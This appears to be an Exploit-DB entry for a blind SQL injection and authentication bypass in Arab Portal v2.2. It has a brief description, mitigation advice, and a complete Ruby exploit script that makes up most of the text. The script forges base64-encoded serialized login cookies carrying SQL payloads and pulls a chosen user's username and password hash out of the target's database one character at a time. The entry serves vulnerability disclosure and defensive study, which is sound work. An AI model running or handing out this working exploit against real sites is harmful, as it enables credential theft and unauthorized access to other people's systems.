vendor:
Arab Portal v2.2
by:
Jafer Al-Zidjali
8,8
CVSS
HIGH
Blind SQL Injection / Authentication Bypass
89
CWE
Product Name: Arab Portal v2.2
Affected Version From: Arab Portal v2.2
Affected Version To: Arab Portal v2.2
Patch Exists: YES
Related CWE: CWE-89 (Improper Neutralization of Special Elements used in an SQL Command)
CPE: a:arab_portal:arab_portal_v2.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Arab Portal v2.2 Exploit

This exploit bypasses authentication on Arab Portal v2.2 by abusing a blind SQL injection reachable through the application's login cookie. The script sends a base64-encoded cookie in PHP serialize()-style array form (`a:5:{...}`) whose user-id field carries a SQL fragment, and uses the presence of an `action=logout` link in the response (i.e. a logged-in page) as a true/false oracle. The included script recovers a user's username length, username, and 32-character (hex) password hash one character at a time; the same blind technique can in principle be used to gather other database information such as the database name, user, table prefix, table and column names and data, but that is not implemented in the script below.

Mitigation:

Use parameterized queries (prepared statements) for every database access instead of building SQL from request data, and treat cookie contents as untrusted input: do not unserialize client-supplied cookie data, and validate each field (here, the user id) before it reaches a query. Retest the application for SQL injection after the fix. Since the record above indicates a patch exists, upgrading to the vendor's patched release is the first step.

Exploit-DB raw data:

#!/usr/bin/ruby

#=============================================#
#          Arab Portal v2.2 Exploit           #,
# Blind SQL Injection / Authentication Bypass #
#  Discovered & written by: Jafer Al-Zidjali  #
#         Email: jafer@scorpionds.com         #
#         Website: www.scorpionds.com         #
#=============================================#

require "net/http"
require "base64"

# Start-up banner, one array element per terminal row (no trailing newlines).
# The rows are fed to print_intro below.
intro = <<BANNER.split("\n")
+=============================================+
+          Arab Portal v2.2 Exploit           +
+ Blind SQL Injection / Authentication Bypass +
+  Discovered & written by: Jafer Al-Zidjali  +
+         Email: jafer@scorpionds.com         +
+         Website: www.scorpionds.com         +
+=============================================+
BANNER

# Types the banner out one character at a time with a small "spinner" glyph
# trailing the cursor. Purely cosmetic.
#
# text - Array of Strings, one per banner row. Rows are scanned with /./,
#        so a newline inside a row would be skipped rather than printed.
#
# Side effects only: writes to $stdout and sleeps 0.05 s per character.
# Returns the input array (result of text.each); callers ignore it.
def print_intro(text)
  glyphs = ["|", "/", "-", "\\"]
  turn = 0                        # spinner state carries over between rows
  text.each do |row|
    row.scan(/./) do |ch|
      STDOUT.flush
      # Erase the previous glyph, emit the character, draw the next glyph.
      print "\b#{ch}#{glyphs[turn]}"
      turn = (turn + 1) % glyphs.size
      sleep 0.05
    end
    print "\b "                   # wipe the glyph left after the last character
    puts ""
  end
end

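print_intro intro

puts "\nEnter host name (e.g. example.com):"
host = gets.chomp

puts "\nEnter script path (e.g. /arabportal/):"
path = gets.chomp

puts "\nEnter userid:"
userid = gets.chomp

# ---------------------------------------------------------------------------
# Helpers. Top-level locals are not visible inside methods, so everything a
# helper needs is passed in explicitly.
# ---------------------------------------------------------------------------

# Picks the name of the login cookie out of a Set-Cookie header value.
#
# Heuristic inherited from the original exploit: the login cookie is assumed
# to be the longest "name=value" fragment. Net::HTTP joins several Set-Cookie
# headers with ", " and cookie attributes are separated by "; ", so both
# separators are considered. Returns nil when no name can be found (the
# original raised NoMethodError on nil in that case).
def guess_login_cookie_name(set_cookie)
  return nil if set_cookie.nil? || set_cookie.empty?
  fragment = set_cookie.split("; ").max_by { |part| part.length }.to_s
  fragment = fragment.split(", ").max_by { |part| part.length }.to_s
  name = fragment.split("=", 2).first.to_s
  name.empty? ? nil : name
end

# Serialises an injected user-id value into the cookie the application
# reads: a PHP serialize()-style array of five fields (a:5:{...}), then
# base64-encoded. Field 2 is the user id and is the injection point; the
# other four fields are fixed to the values the original exploit sent.
# Returns the full "name=value" cookie string.
def build_login_cookie(cookie_name, stmt)
  # PHP's s:N:"..." length is a byte count, hence bytesize rather than length
  # (identical for ASCII input, which is all the probes below produce).
  serialized = "a:5:{i:0;s:10:\"arabportal\";i:1;i:1;i:2;" \
               "s:#{stmt.bytesize}:\"#{stmt}\";i:3;i:0;i:4;s:1:\"a\";}"
  "#{cookie_name}=#{Base64.strict_encode64(serialized)}"
end

# Boolean oracle: sends one request carrying the injected cookie and reports
# whether the injected condition held. A logged-in page contains an
# "action=logout" link; an anonymous page does not.
def condition_true?(http, path, cookie_name, stmt)
  resp = http.get(path, "Cookie" => build_login_cookie(cookie_name, stmt))
  resp.body.to_s.include?("action=logout")
end

# SQL fragments injected through the user-id field. The leading quote closes
# the application's own string literal; the trailing " or ''='" re-opens one
# so the closing quote already present in the query stays balanced.
def length_probe(userid, column, n)
  "#{userid}' and length(#{column})=#{n} or ''='"
end

def char_probe(userid, column, pos, ch)
  "#{userid}' and substring(#{column},#{pos},1)='#{ch}' or ''='"
end

# Recovers `length` characters of `column` for the given user, one position
# at a time, by trying each character of `alphabet` against the oracle.
# Echoes every guess and backspaces over misses, so only confirmed characters
# remain on screen. A position that no candidate matched (e.g. a character
# outside `alphabet`) is shown and returned as "?" instead of being silently
# dropped, which in the original shifted all later characters left.
def extract_column(http, path, cookie_name, userid, column, length, alphabet)
  recovered = String.new
  length.times do |idx|
    hit = alphabet.each_char.find do |ch|
      print ch
      STDOUT.flush
      ok = condition_true?(http, path, cookie_name, char_probe(userid, column, idx + 1, ch))
      print "\b" unless ok
      ok
    end
    if hit.nil?
      print "?"
      STDOUT.flush
      hit = "?"
    end
    recovered << hit
  end
  recovered
end

# ---------------------------------------------------------------------------
# Main flow.
# ---------------------------------------------------------------------------

puts "\nGetting cookie value..."

# Plain HTTP on port 80 only, exactly as the original exploit did. userid is
# the operator's own input and is meant to carry SQL, so it is not escaped.
http = Net::HTTP.new(host, 80)

resp = http.get(path)
cookie = resp["set-cookie"]

login_info = guess_login_cookie_name(cookie)
if login_info.nil?
  abort "\nNo usable Set-Cookie header from http://#{host}#{path} - wrong path, or not Arab Portal?"
end

puts "Cookie name is: " + login_info

puts "\nWhat do you want to do?"
puts "1. Get username."
puts "2. Get password hash."

opt = gets.chomp

case opt
when "1"
  print "\nGetting username length"
  # Lengths 0..19 are probed, as in the original; nil means none matched.
  unamelen = (0...20).find do |n|
    ok = condition_true?(http, path, login_info, length_probe(userid, "username", n))
    unless ok
      print "."
      STDOUT.flush
    end
    ok
  end
  if unamelen
    puts "\nLength is: #{unamelen}"
  else
    # The original silently continued with length 0 here; say so instead.
    puts "\nNo length between 0 and 19 matched - is the userid valid? Skipping username."
    unamelen = 0
  end

  print "\nGetting username: "
  extract_column(http, path, login_info, userid, "username", unamelen,
                 "abcdefghijklmnopqrstuvwxyz0123456789")
  puts "\nHave fun :)"
when "2"
  print "\nGetting password hash: "
  # 32 hex digits: the stored hash is assumed to be MD5-sized, as in the original.
  extract_column(http, path, login_info, userid, "password", 32, "0123456789abcdef")
  puts "\nHave fun :)"
else
  # The original fell through silently on any other input.
  puts "\nUnknown option #{opt.inspect}; nothing done."
end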

# milw0rm.com [2009-08-07]